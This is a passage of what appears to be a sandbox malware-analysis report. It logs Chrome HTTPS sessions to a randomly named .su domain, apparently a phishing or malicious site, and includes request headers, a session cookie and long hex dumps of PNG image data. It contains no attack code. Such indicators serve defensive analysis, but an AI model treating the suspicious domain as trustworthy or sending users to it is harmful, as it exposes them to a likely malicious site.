                                                          2024-01-24 14:34:31 UTC1369INData Raw: 33 3a 78 a6 0e 9c e4 06 3b c7 cc 86 fc e8 13 4d c6 91 66 c5 c0 9e db 71 4f 79 c2 c5 b9 9b 87 2f 04 cc 75 dd 6a 0a dc 2b 54 2f 82 22 fc e2 69 14 f6 b8 c1 b8 39 b1 5f 3f 25 b2 4e aa 6e d4 2a ba 0a ea 60 6f 5b c4 eb 52 42 f5 76 b9 6b 3e de af 9a 7f 78 90 70 bd bb 6d ee 1e a7 cd ed fa 84 0c 29 c4 c7 22 62 1f 66 35 43 1f 6b e8 bb 1b f2 07 fa e7 80 d9 b9 08 bf 3f 4c 3c ff 7f 33 7f 6c 7e 73 73 d5 fc 46 02 f6 c3 f4 a2 f9 30 47 c0 3e 36 23 b5 30 27 35 32 6a 95 a2 03 a9 73 d1 9c 96 b2 38 77 63 95 24 a7 72 ea d3 e5 6f 9d 68 f7 0e b5 8b f0 b5 e6 c5 50 9b 1d 1c 6b eb e1 b9 eb 7d 4e c9 27 18 f2 f7 a5 61 9d 42 c4 07 5f 23 17 08 e3 d4 78 1e 03 3f c2 df da 9f 3a 1d fd 70 ac 29 2f 0d f9 fe 31 8d f8 69 0d 79 df 6f 8f 83 7b 14 e2 81 ba 08 6e ce b8 60 3f 7e fb 39 f2 1c 25 92
                                                          Data Ascii: 3:x;MfqOy/uj+T/"i9_?%Nn*`o[RBvk>xpm)"bf5Ck?L<3l~ssF0G>6#0'52js8wc$rohPk}N'aB_#x?:p)/1iyo{n`?~9%
                                                          2024-01-24 14:34:31 UTC1369INData Raw: ef 3d 65 de 5b e6 27 67 47 d5 8f c4 b3 8c 98 e5 dc 7c b5 18 b1 b8 46 70 ae 57 cd 52 7b 04 e6 72 81 30 7d 68 1e 74 fc c0 fe c0 66 e2 14 61 ca be de cc 6c 7f c3 4f 36 13 bb 0a 0b 91 6b cb 9e 25 4e 11 a8 b1 31 43 bb 5e 6f e4 cf aa c4 4b 62 56 e6 af 7d 78 92 24 49 92 24 49 92 7c bd 7c 55 02 96 f1 a6 6f 3e f0 f4 59 9f d3 66 f1 dc 5d 39 f9 c2 74 f1 fe f2 f1 8a b8 30 d0 f7 f7 13 bb 2d 04 80 9f d7 f1 f5 e3 d7 f2 16 b7 35 fd f7 5f fb 84 00 3d 04 d7 11 86 f1 e5 de d8 10 a0 08 54 b7 f3 54 30 86 9b 6b 73 7f d9 fc e1 bb f9 de c6 17 80 d9 42 d0 86 9f fd 2d 44 6e 2d 4e bb 4d f9 f4 ff fa ef 9b bb ff e3 ff be 88 eb 4e 54 47 9c 9e 83 af 30 bf 06 74 e9 85 d2 37 96 90 bd 1c 8d 9b 4b ed f9 b9 9c b1 8e c7 63 ff f9 9c 8b d1 44 e6 12 b2 8a 0a b1 b9 68 bc 1e f9 72 5e 44 ec ba 59
                                                          Data Ascii: =e['gG|FpWR{r0}htfalO6k%N1C^oKbV}x$I$I||Uo>Yf]9t0-5_=TT0ksB-Dn-NMNTG0t7KcDhr^DY
                                                          2024-01-24 14:34:31 UTC1369INData Raw: fe 1b 02 f6 c3 64 d7 5c 49 70 1d a2 16 b1 61 0f 33 44 2c 33 b1 cc c2 1e 12 b0 40 fc 98 0d 86 7a 46 f8 3d 05 2c 65 c4 17 83 99 51 dd f2 9e a9 2d b9 45 00 5e 48 2c 4e 9a ab f9 95 ee 21 ea d7 d8 ca 90 fa 84 e8 e5 1d 53 7f 3f 95 f7 5f 17 ad 80 45 fc 72 bd 2f 42 87 08 11 8b 38 e5 7e a5 ee fa 87 97 ba 72 00 ea bb d5 3b d9 99 21 5c 2b 01 8b b0 8e fb c8 ea b7 fc 20 8e 26 6a d5 d6 4c 54 0e dc 1f af ad 7f 49 92 24 49 92 24 c9 d7 c9 51 01 1b 83 56 fb ba e8 ed 4f cd 4f f7 fe 7e 1a 83 cd 98 1d 61 c0 ca cc 0c 20 5c 27 1a 5c 4e 67 57 12 b0 3e fb c7 cc 08 20 84 18 6f 32 46 dd 31 58 65 d0 2f 51 61 30 08 56 58 6c 63 06 9c 32 df c9 1d 1f 63 81 98 85 31 01 18 6e 44 3b ab 18 7b 81 80 26 ac 9b ab ab 66 a4 01 38 ac ef 6f 9b bb e5 5a e9 58 5a 7c 47 8a e7 d5 5c e2 8c 70 8a a0 66
                                                          Data Ascii: d\Ipa3D,3@zF=,eQ-E^H,N!S?_Er/B8~r;!\+ &jLTI$I$QVOO~a \'\NgW> o2F1Xe/Qa0VXlc2c1nD;{&f8oZXZ|G\pf
                                                          2024-01-24 14:34:31 UTC1369INData Raw: c2 08 11 4b 1e 4e af be 6b 05 2c 33 b1 b1 84 f8 d4 59 ad f7 9e 81 fd 4f 3f 2c 9b ff ef 1f 97 27 09 58 e8 8b c4 e0 90 80 85 10 b1 41 fd be 6a 4d bc bb 7a 88 fe 7b b6 87 c2 7c 2e 0d 01 76 e3 43 53 6f 9e 81 15 b5 88 0d 6c 19 3e 0f 4a 0e b9 2f 22 36 3e ea 66 cb e8 d9 cb 9c 7a 87 7f d4 41 ee 3d 04 2c f5 26 ea ce 90 80 a5 2d e0 e3 65 5c 8b 07 30 08 57 ab cb 65 8b 0f b3 bd a4 1e 26 49 92 24 49 92 24 3f 3f 8e 8e 04 35 0c b5 fd e3 a5 8f e4 99 2d 44 f8 d5 1b 82 35 84 5d ec 19 90 0e 8a 35 99 ef ed 45 08 c8 1a 66 57 ec f7 28 4d 50 49 3c 4d 5c 40 f1 21 97 58 46 88 e0 42 c8 61 27 66 60 fb 20 ec 18 08 33 18 e7 3a 62 2d 84 a1 85 5b e2 58 8b d5 21 e1 7a 8c b0 cf 9e 74 84 9f b1 c4 19 42 cc 86 b8 1d a2 9f 07 30 64 16 20 16 78 47 54 5a c1 44 44 2c 09 e6 47 8b 3c cd 08 79 cf
                                                          Data Ascii: KNk,3YO?,'XAjMz{|.vCSol>J/"6>fzA=,&-e\0We&I$I$??5-D5]5EfW(MPI<M\@!XFBa'f` 3:b-[X!ztB0d xGTZDD,G<y
                                                          2024-01-24 14:34:31 UTC1369INData Raw: 7b 66 15 b8 05 dc da 4c 6a 25 d4 23 de 23 c5 87 34 f5 d9 2a 2e 72 24 37 78 ef 33 96 16 7e 0d a2 51 82 97 f8 f1 d3 44 d8 35 01 ab 4d 9e 36 97 32 40 44 cb 86 09 e5 cb b1 04 2c 76 89 96 fc b2 07 0b 0a a3 86 2f cd 46 38 96 76 2c 5b de 20 a8 3d 7f 3c de be 24 9a 9f ed 39 fa 51 9f 1e b8 0f 61 df fa ff 0a f0 07 01 bb de 74 bf 05 fb c3 dd 43 f3 d7 9f 9a e6 9f 3e 2e 9b bf 7f 70 7f 1f 36 bf 8c 19 58 e0 9d 57 e0 5d e0 5f 4b b0 fe eb 5f 5f 36 bf b9 b9 6a a4 61 db e5 c3 4c c0 a7 80 4d 92 24 49 92 24 49 7e 8e 9c 24 60 c1 c4 2a 02 8d d9 43 89 2a 9b b5 8c 73 d1 ce 44 9a a0 c2 0c e1 62 46 46 98 ed cd c4 ca 0c 2b 08 2a 8e c1 84 9a ce 99 39 8d 99 ce 3d 11 54 85 09 26 1c e5 96 f7 4b cd 1f 61 1f 2f 42 e0 95 78 9a e0 25 5c 39 b3 99 4e 6d b6 2f ec 0b ac 2e 8e 17 c5 4e f8 bb 17
                                                          Data Ascii: {fLj%##4*.r$7x3~QD5M62@D,v/F8v,[ =<$9QatC>.p6XW]_K__6jaLM$I$I~$`*C*sDbFF+*9=T&Ka/Bx%\9Nm/.N
                                                          2024-01-24 14:34:31 UTC1369INData Raw: 49 92 24 49 92 24 49 72 1e 2e 6f ef 17 26 5c ff fe e3 a2 f9 f1 61 d3 7c bc bb 37 11 cb 92 e2 58 56 dc 87 99 d9 78 77 36 df 9b 4d fa b0 62 98 e5 c3 b6 8e 38 49 92 24 49 92 24 49 92 e4 4c 5c 2e 77 e3 66 b9 5a 35 77 9b c7 e6 87 bb 55 f3 b0 bd 6c 96 eb 4d 99 81 bd 78 22 4c 39 67 66 96 25 c6 9b cd d6 b7 32 5b 9b 22 36 71 ca b2 61 a9 d8 7c ff 35 49 92 24 49 92 24 49 92 73 71 89 58 45 b4 ae 96 eb e6 61 b5 35 21 0b bb ed d6 f6 35 ad 78 35 e1 ba 69 96 52 ae 6c fe ce ec 69 22 d6 3e f0 73 60 4b 01 fc f3 23 cb 34 49 92 24 49 92 24 49 92 73 d1 fe 0e ec 73 b0 4c 98 59 d7 d5 6a 6d a2 f5 6e b9 6d 6e 1f 96 b6 dd 69 bb 5f 21 66 1f 8f 7e fc 09 d1 bb 5e af e5 c7 aa dd 96 cb a5 f9 b9 d6 b5 cd 66 65 76 36 db 4e d4 6e 25 a4 87 b6 5a f8 d6 5b fe 6c cb d7 46 96 47 92 24 49 92 24
                                                          Data Ascii: I$I$Ir.o&\a|7XVxw6Mb8I$I$IL\.wfZ5wUlMx"L9gf%2["6qa|5I$I$IsqXEa5!5x5iRli">s`K#4I$I$IssLYjmnmni_!f~^fev6Nn%Z[lFG$I$
                                                          2024-01-24 14:34:31 UTC1369INData Raw: d9 f2 fb ae bc bf ca 6f bd 3a c5 3e cb 83 11 44 b2 8f f0 ad 7f 1f 76 74 e9 cb 90 f9 fa f0 64 3c 49 e1 f4 85 08 01 0b d4 9f 5c ca 9d 24 49 92 24 49 92 24 c9 39 38 2a 60 11 a2 fc 14 0e b3 a4 21 62 d9 83 2d 1f ae be 42 cc ef bf 02 c2 15 77 b5 78 0d 10 36 2e 6e 8a 02 2e e0 7f 08 9e 56 d8 0a 17 3e e1 81 9b b7 62 48 f6 30 d9 b7 7f d9 8c ec f7 64 f9 89 9f 62 98 7c 76 28 12 66 c6 6d 06 bd 6c 49 92 24 49 92 24 49 92 24 6f e5 e2 ff f9 37 b7 8f 1f ef ee 9b bf fd e8 c2 74 3a 9b 98 80 fd cb df cc 9b eb a9 2f 01 06 5b ea cb 2c ea 0e 41 eb 33 af 97 97 a3 bd 63 df b3 8c f8 c2 be 0e 75 8a 6e 71 01 8a 80 f5 f3 53 c0 df 43 f6 53 30 7d 79 ea 77 60 b3 3c 92 24 49 92 24 49 92 24 39 17 17 ff e9 bf fe f8 f8 71 d9 34 cc c2 de 6d 1e 9b 1b 89 cf 3f 7c 3f 6f 7e f7 61 6c 02 56 ff 5b
                                                          Data Ascii: o:>Dvtd<I\$I$I$98*`!b-Bwx6.n.V>bH0db|v(fmlI$I$I$o7t:/[,A3cunqSCS0}yw`<$I$I$9q4m?|?o~alV[
                                                          2024-01-24 14:34:31 UTC986INData Raw: 06 7d b3 58 b6 1c 42 79 f7 98 2f bf 26 49 92 24 49 92 24 c9 39 39 49 c0 22 52 f9 12 2c 33 61 eb 32 b8 5f db 80 5f 62 c0 de 03 94 00 d8 76 62 f6 90 6e b1 25 a1 83 1b ee 7c d6 4e ff 0f c2 75 c2 b0 9f 2f 29 ef 1f 76 61 9e 57 2c 25 6f c7 67 5e df 28 e2 f8 92 12 82 58 e2 75 36 f2 f7 58 99 e9 64 d6 13 11 fb dd 77 1f 6c 0b 86 44 ed d0 d2 62 a3 37 33 1a b3 b5 50 cf dc c6 86 30 ad b7 30 07 66 75 89 63 3d db 7a a1 3a 9d 24 49 92 24 49 92 24 c9 f9 78 76 09 31 c2 d0 66 a7 b4 d9 4c 95 c4 2a f0 b3 21 97 bc 53 38 f6 41 fb e5 e5 a8 b9 90 d8 e0 d8 bf bc fa 74 e9 28 62 93 ad 8f 7d dd d5 74 8a ff 76 e6 31 b7 36 13 1c 9f 85 15 cc c8 29 60 77 5b 9c 0c b9 4f 3e 1f fe 20 c2 cb e8 ad cb 67 29 6f 1e 9e 2c 17 8b e6 d3 dd 5d 73 7f fb c9 7e 46 e7 fe fe 61 6f f6 14 62 46 34 66 4f 6b
                                                          Data Ascii: }XBy/&I$I$99I"R,3a2__bvbn%|Nu/)vaW,%og^(Xu6XdwlDb73P00fuc=z:$I$I$xv1fL*!S8At(b}tv16)`w[O> g)o,]s~FaobF4fOk


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          42192.168.2.649765172.67.199.1734432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:31 UTC746OUTGET /VDgyaQMqDddyxrJrBbYdMwrE/6CtriZAVvTVfZo/24z5NeChfvx HTTP/1.1
                                                          Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPE
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
                                                          2024-01-24 14:34:31 UTC699INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:31 GMT
                                                          Content-Type: image/png
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          cache-control: no-store, no-cache, must-revalidate
                                                          pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=15l5pT8b2kDoiowGcCKBAqhmWFP3aTqbeMgvvcxUGsfZyBVOQZiSXDOoYSC1r4sPYZJqnF6Pf%2BP%2FR%2BFxmrwv%2BeCSNdMX8UtWFbOWeJPO0r%2F6BomqEtRpIj0a2r7BMy9rGVTvWINLqHeEz6%2BlhVRyWD%2FYtRcx"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 84a8ff6b5e6c1d70-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:31 UTC670INData Raw: 33 31 33 63 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 b0 00 00 01 b0 08 06 00 00 00 90 22 89 eb 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 09 70 48 59 73 00 00 0e c2 00 00 0e c2 01 15 28 4a 80 00 00 ff a5 49 44 41 54 78 5e ec fd d9 8e 2c c9 96 a6 89 a9 bb 8d ee be 23 ce 98 79 b2 b2 aa 51 53 83 04 d8 20 c0 e7 2b b2 80 7a 02 f2 96 17 7c 91 be 23 01 82 bc e0 05 0b 44 37 49 90 a8 aa 24 b2 33 2b a7 73 22 62 6f 1f 6c 76 fe df 5a b2 54 c5 d4 d5 cc cd dd cd f7 10 b1 be bd d5 55 55 54 66 11 15 91 5f 45 54 ed e2 ff f4 7f fd bf 3d 36 df 08 e3 d1 a8 1c 7d 1d 5c 5e 3e 8d cf 6e b7 1d 34 7f 4f c6 a3 cb 66 b3 dd b5 fb 9a 43 d7 38 7f 33 17 3d 3f 1e 3b ff 23 2c 0b 27 ec 55 d7 07 c1 de 73 76 7a 44 da
                                                          Data Ascii: 313cPNGIHDR"gAMAasRGBpHYs(JIDATx^,#yQS +z|#D7I$3+s"bolvZTUUTf_ET=6}\^>n4OfC83=?;#,'UsvzD
                                                          2024-01-24 14:34:31 UTC1369INData Raw: 5e 53 e6 df fa b8 e3 14 be f6 34 be 65 ec 14 6e 6b f0 a7 9f e6 da de 21 f3 d7 12 63 30 c6 63 2f e1 ad f1 08 f7 e7 48 43 f2 f5 b0 dd ec d7 a3 d1 78 7f 8c 7f f1 3f fd cd df 5a 33 b7 53 95 bb 54 f5 63 1f 70 0e b5 d9 e7 60 d7 7b aa c5 00 bd 16 2d af e1 b2 3c 41 db ea df c5 b6 f3 eb 71 e4 69 ac cd 92 d7 f3 58 ea 4c cd 45 af fe 9c 62 27 18 b2 bb 59 af 9b 87 dd b8 9c fd b2 b9 ba dc 34 e3 c9 a4 9c 1d a7 ce e3 a1 7c 3d 06 6e 5f ea e6 39 86 fc 1c aa 2b 61 76 ce f0 4f 49 cf 7b 84 1b bc a7 df 6f a1 ce ff a1 b8 9d 92 6f a7 72 c8 af 3a 0e 7d ce 19 36 7c 89 fc 1f 4a 77 3f cd 71 fd a5 76 e1 4b a4 e9 a5 f4 d3 00 a7 c4 fb 14 77 43 76 82 d7 e6 0d 7e d6 6e fb 61 1c ba d6 37 7f 49 f8 c7 d2 01 e1 d7 90 bd 43 e1 1c 8b f7 10 a7 c6 a1 e6 98 9b 53 c3 ab d3 56 1f bf 85 7e d8 43 7e
                                                          Data Ascii: ^S4enk!c0c/HCx?Z3STcp`{-<AqiXLEb'Y4|=n_9+avOI{oor:}6|Jw?qvKwCv~na7ICSV~C~
                                                          2024-01-24 14:34:31 UTC1369INData Raw: 4e 92 53 a9 33 3a 78 a6 0e 9c e4 06 3b c7 cc 86 fc e8 13 4d c6 91 66 c5 c0 9e db 71 4f 79 c2 c5 b9 9b 87 2f 04 cc 75 dd 6a 0a dc 2b 54 2f 82 22 fc e2 69 14 f6 b8 c1 b8 39 b1 5f 3f 25 b2 4e aa 6e d4 2a ba 0a ea 60 6f 5b c4 eb 52 42 f5 76 b9 6b 3e de af 9a 7f 78 90 70 bd bb 6d ee 1e a7 cd ed fa 84 0c 29 c4 c7 22 62 1f 66 35 43 1f 6b e8 bb 1b f2 07 fa e7 80 d9 b9 08 bf 3f 4c 3c ff 7f 33 7f 6c 7e 73 73 d5 fc 46 02 f6 c3 f4 a2 f9 30 47 c0 3e 36 23 b5 30 27 35 32 6a 95 a2 03 a9 73 d1 9c 96 b2 38 77 63 95 24 a7 72 ea d3 e5 6f 9d 68 f7 0e b5 8b f0 b5 e6 c5 50 9b 1d 1c 6b eb e1 b9 eb 7d 4e c9 27 18 f2 f7 a5 61 9d 42 c4 07 5f 23 17 08 e3 d4 78 1e 03 3f c2 df da 9f 3a 1d fd 70 ac 29 2f 0d f9 fe 31 8d f8 69 0d 79 df 6f 8f 83 7b 14 e2 81 ba 08 6e ce b8 60 3f 7e fb 39
                                                          Data Ascii: NS3:x;MfqOy/uj+T/"i9_?%Nn*`o[RBvk>xpm)"bf5Ck?L<3l~ssF0G>6#0'52js8wc$rohPk}N'aB_#x?:p)/1iyo{n`?~9
                                                          2024-01-24 14:34:31 UTC1369INData Raw: b6 f1 7e 72 ef 3d 65 de 5b e6 27 67 47 d5 8f c4 b3 8c 98 e5 dc 7c b5 18 b1 b8 46 70 ae 57 cd 52 7b 04 e6 72 81 30 7d 68 1e 74 fc c0 fe c0 66 e2 14 61 ca be de cc 6c 7f c3 4f 36 13 bb 0a 0b 91 6b cb 9e 25 4e 11 a8 b1 31 43 bb 5e 6f e4 cf aa c4 4b 62 56 e6 af 7d 78 92 24 49 92 24 49 92 7c bd 7c 55 02 96 f1 a6 6f 3e f0 f4 59 9f d3 66 f1 dc 5d 39 f9 c2 74 f1 fe f2 f1 8a b8 30 d0 f7 f7 13 bb 2d 04 80 9f d7 f1 f5 e3 d7 f2 16 b7 35 fd f7 5f fb 84 00 3d 04 d7 11 86 f1 e5 de d8 10 a0 08 54 b7 f3 54 30 86 9b 6b 73 7f d9 fc e1 bb f9 de c6 17 80 d9 42 d0 86 9f fd 2d 44 6e 2d 4e bb 4d f9 f4 ff fa ef 9b bb ff e3 ff be 88 eb 4e 54 47 9c 9e 83 af 30 bf 06 74 e9 85 d2 37 96 90 bd 1c 8d 9b 4b ed f9 b9 9c b1 8e c7 63 ff f9 9c 8b d1 44 e6 12 b2 8a 0a b1 b9 68 bc 1e f9 72 5e
                                                          Data Ascii: ~r=e['gG|FpWR{r0}htfalO6k%N1C^oKbV}x$I$I||Uo>Yf]9t0-5_=TT0ksB-Dn-NMNTG0t7KcDhr^
                                                          2024-01-24 14:34:31 UTC1369INData Raw: c0 22 2c 59 fe 1b 02 f6 c3 64 d7 5c 49 70 1d a2 16 b1 61 0f 33 44 2c 33 b1 cc c2 1e 12 b0 40 fc 98 0d 86 7a 46 f8 3d 05 2c 65 c4 17 83 99 51 dd f2 9e a9 2d b9 45 00 5e 48 2c 4e 9a ab f9 95 ee 21 ea d7 d8 ca 90 fa 84 e8 e5 1d 53 7f 3f 95 f7 5f 17 ad 80 45 fc 72 bd 2f 42 87 08 11 8b 38 e5 7e a5 ee fa 87 97 ba 72 00 ea bb d5 3b d9 99 21 5c 2b 01 8b b0 8e fb c8 ea b7 fc 20 8e 26 6a d5 d6 4c 54 0e dc 1f af ad 7f 49 92 24 49 92 24 c9 d7 c9 51 01 1b 83 56 fb ba e8 ed 4f cd 4f f7 fe 7e 1a 83 cd 98 1d 61 c0 ca cc 0c 20 5c 27 1a 5c 4e 67 57 12 b0 3e fb c7 cc 08 20 84 18 6f 32 46 dd 31 58 65 d0 2f 51 61 30 08 56 58 6c 63 06 9c 32 df c9 1d 1f 63 81 98 85 31 01 18 6e 44 3b ab 18 7b 81 80 26 ac 9b ab ab 66 a4 01 38 ac ef 6f 9b bb e5 5a e9 58 5a 7c 47 8a e7 d5 5c e2 8c
                                                          Data Ascii: ",Yd\Ipa3D,3@zF=,eQ-E^H,N!S?_Er/B8~r;!\+ &jLTI$I$QVOO~a \'\NgW> o2F1Xe/Qa0VXlc2c1nD;{&f8oZXZ|G\
                                                          2024-01-24 14:34:31 UTC1369INData Raw: b4 83 f0 33 c2 08 11 4b 1e 4e af be 6b 05 2c 33 b1 b1 84 f8 d4 59 ad f7 9e 81 fd 4f 3f 2c 9b ff ef 1f 97 27 09 58 e8 8b c4 e0 90 80 85 10 b1 41 fd be 6a 4d bc bb 7a 88 fe 7b b6 87 c2 7c 2e 0d 01 76 e3 43 53 6f 9e 81 15 b5 88 0d 6c 19 3e 0f 4a 0e b9 2f 22 36 3e ea 66 cb e8 d9 cb 9c 7a 87 7f d4 41 ee 3d 04 2c f5 26 ea ce 90 80 a5 2d e0 e3 65 5c 8b 07 30 08 57 ab cb 65 8b 0f b3 bd a4 1e 26 49 92 24 49 92 24 3f 3f 8e 8e 04 35 0c b5 fd e3 a5 8f e4 99 2d 44 f8 d5 1b 82 35 84 5d ec 19 90 0e 8a 35 99 ef ed 45 08 c8 1a 66 57 ec f7 28 4d 50 49 3c 4d 5c 40 f1 21 97 58 46 88 e0 42 c8 61 27 66 60 fb 20 ec 18 08 33 18 e7 3a 62 2d 84 a1 85 5b e2 58 8b d5 21 e1 7a 8c b0 cf 9e 74 84 9f b1 c4 19 42 cc 86 b8 1d a2 9f 07 30 64 16 20 16 78 47 54 5a c1 44 44 2c 09 e6 47 8b 3c
                                                          Data Ascii: 3KNk,3YO?,'XAjMz{|.vCSol>J/"6>fzA=,&-e\0We&I$I$??5-D5]5EfW(MPI<M\@!XFBa'f` 3:b-[X!ztB0d xGTZDD,G<
                                                          2024-01-24 14:34:31 UTC1369INData Raw: 06 32 0f 3b 7b 66 15 b8 05 dc da 4c 6a 25 d4 23 de 23 c5 87 34 f5 d9 2a 2e 72 24 37 78 ef 33 96 16 7e 0d a2 51 82 97 f8 f1 d3 44 d8 35 01 ab 4d 9e 36 97 32 40 44 cb 86 09 e5 cb b1 04 2c 76 89 96 fc b2 07 0b 0a a3 86 2f cd 46 38 96 76 2c 5b de 20 a8 3d 7f 3c de be 24 9a 9f ed 39 fa 51 9f 1e b8 0f 61 df fa ff 0a f0 07 01 bb de 74 bf 05 fb c3 dd 43 f3 d7 9f 9a e6 9f 3e 2e 9b bf 7f 70 7f 1f 36 bf 8c 19 58 e0 9d 57 e0 5d e0 5f 4b b0 fe eb 5f 5f 36 bf b9 b9 6a a4 61 db e5 c3 4c c0 a7 80 4d 92 24 49 92 24 49 7e 8e 9c 24 60 c1 c4 2a 02 8d d9 43 89 2a 9b b5 8c 73 d1 ce 44 9a a0 c2 0c e1 62 46 46 98 ed cd c4 ca 0c 2b 08 2a 8e c1 84 9a ce 99 39 8d 99 ce 3d 11 54 85 09 26 1c e5 96 f7 4b cd 1f 61 1f 2f 42 e0 95 78 9a e0 25 5c 39 b3 99 4e 6d b6 2f ec 0b ac 2e 8e 17 c5
                                                          Data Ascii: 2;{fLj%##4*.r$7x3~QD5M62@D,v/F8v,[ =<$9QatC>.p6XW]_K__6jaLM$I$I~$`*C*sDbFF+*9=T&Ka/Bx%\9Nm/.
                                                          2024-01-24 14:34:31 UTC1369INData Raw: 27 9f 82 24 49 92 24 49 92 24 49 72 1e 2e 6f ef 17 26 5c ff fe e3 a2 f9 f1 61 d3 7c bc bb 37 11 cb 92 e2 58 56 dc 87 99 d9 78 77 36 df 9b 4d fa b0 62 98 e5 c3 b6 8e 38 49 92 24 49 92 24 49 92 e4 4c 5c 2e 77 e3 66 b9 5a 35 77 9b c7 e6 87 bb 55 f3 b0 bd 6c 96 eb 4d 99 81 bd 78 22 4c 39 67 66 96 25 c6 9b cd d6 b7 32 5b 9b 22 36 71 ca b2 61 a9 d8 7c ff 35 49 92 24 49 92 24 49 92 73 71 89 58 45 b4 ae 96 eb e6 61 b5 35 21 0b bb ed d6 f6 35 ad 78 35 e1 ba 69 96 52 ae 6c fe ce ec 69 22 d6 3e f0 73 60 4b 01 fc f3 23 cb 34 49 92 24 49 92 24 49 92 73 d1 fe 0e ec 73 b0 4c 98 59 d7 d5 6a 6d a2 f5 6e b9 6d 6e 1f 96 b6 dd 69 bb 5f 21 66 1f 8f 7e fc 09 d1 bb 5e af e5 c7 aa dd 96 cb a5 f9 b9 d6 b5 cd 66 65 76 36 db 4e d4 6e 25 a4 87 b6 5a f8 d6 5b fe 6c cb d7 46 96 47 92
                                                          Data Ascii: '$I$I$Ir.o&\a|7XVxw6Mb8I$I$IL\.wfZ5wUlMx"L9gf%2["6qa|5I$I$IsqXEa5!5x5iRli">s`K#4I$I$IssLYjmnmni_!f~^fev6Nn%Z[lFG
                                                          2024-01-24 14:34:31 UTC1369INData Raw: f6 7b af 08 d9 f2 fb ae bc bf ca 6f bd 3a c5 3e cb 83 11 44 b2 8f f0 ad 7f 1f 76 74 e9 cb 90 f9 fa f0 64 3c 49 e1 f4 85 08 01 0b d4 9f 5c ca 9d 24 49 92 24 49 92 24 c9 39 38 2a 60 11 a2 fc 14 0e b3 a4 21 62 d9 83 2d 1f ae be 42 cc ef bf 02 c2 15 77 b5 78 0d 10 36 2e 6e 8a 02 2e e0 7f 08 9e 56 d8 0a 17 3e e1 81 9b b7 62 48 f6 30 d9 b7 7f d9 8c ec f7 64 f9 89 9f 62 98 7c 76 28 12 66 c6 6d 06 bd 6c 49 92 24 49 92 24 49 92 24 6f e5 e2 ff f9 37 b7 8f 1f ef ee 9b bf fd e8 c2 74 3a 9b 98 80 fd cb df cc 9b eb a9 2f 01 06 5b ea cb 2c ea 0e 41 eb 33 af 97 97 a3 bd 63 df b3 8c f8 c2 be 0e 75 8a 6e 71 01 8a 80 f5 f3 53 c0 df 43 f6 53 30 7d 79 ea 77 60 b3 3c 92 24 49 92 24 49 92 24 39 17 17 ff e9 bf fe f8 f8 71 d9 34 cc c2 de 6d 1e 9b 1b 89 cf 3f 7c 3f 6f 7e f7 61 6c
                                                          Data Ascii: {o:>Dvtd<I\$I$I$98*`!b-Bwx6.n.V>bH0db|v(fmlI$I$I$o7t:/[,A3cunqSCS0}yw`<$I$I$9q4m?|?o~al
                                                          2024-01-24 14:34:31 UTC990INData Raw: dc d6 ef db 06 7d b3 58 b6 1c 42 79 f7 98 2f bf 26 49 92 24 49 92 24 c9 39 39 49 c0 22 52 f9 12 2c 33 61 eb 32 b8 5f db 80 5f 62 c0 de 03 94 00 d8 76 62 f6 90 6e b1 25 a1 83 1b ee 7c d6 4e ff 0f c2 75 c2 b0 9f 2f 29 ef 1f 76 61 9e 57 2c 25 6f c7 67 5e df 28 e2 f8 92 12 82 58 e2 75 36 f2 f7 58 99 e9 64 d6 13 11 fb dd 77 1f 6c 0b 86 44 ed d0 d2 62 a3 37 33 1a b3 b5 50 cf dc c6 86 30 ad b7 30 07 66 75 89 63 3d db 7a a1 3a 9d 24 49 92 24 49 92 24 c9 f9 78 76 09 31 c2 d0 66 a7 b4 d9 4c 95 c4 2a f0 b3 21 97 bc 53 38 f6 41 fb e5 e5 a8 b9 90 d8 e0 d8 bf bc fa 74 e9 28 62 93 ad 8f 7d dd d5 74 8a ff 76 e6 31 b7 36 13 1c 9f 85 15 cc c8 29 60 77 5b 9c 0c b9 4f 3e 1f fe 20 c2 cb e8 ad cb 67 29 6f 1e 9e 2c 17 8b e6 d3 dd 5d 73 7f fb c9 7e 46 e7 fe fe 61 6f f6 14 62 46
                                                          Data Ascii: }XBy/&I$I$99I"R,3a2__bvbn%|Nu/)vaW,%og^(Xu6XdwlDb73P00fuc=z:$I$I$xv1fL*!S8At(b}tv16)`w[O> g)o,]s~FaobF


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          43192.168.2.649767104.21.21.1794432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:32 UTC455OUTGET /VDgyaQMqDddyxrJrBbYdMwrE/6KiBzp78P2oq/36bbhCnx2z3zB HTTP/1.1
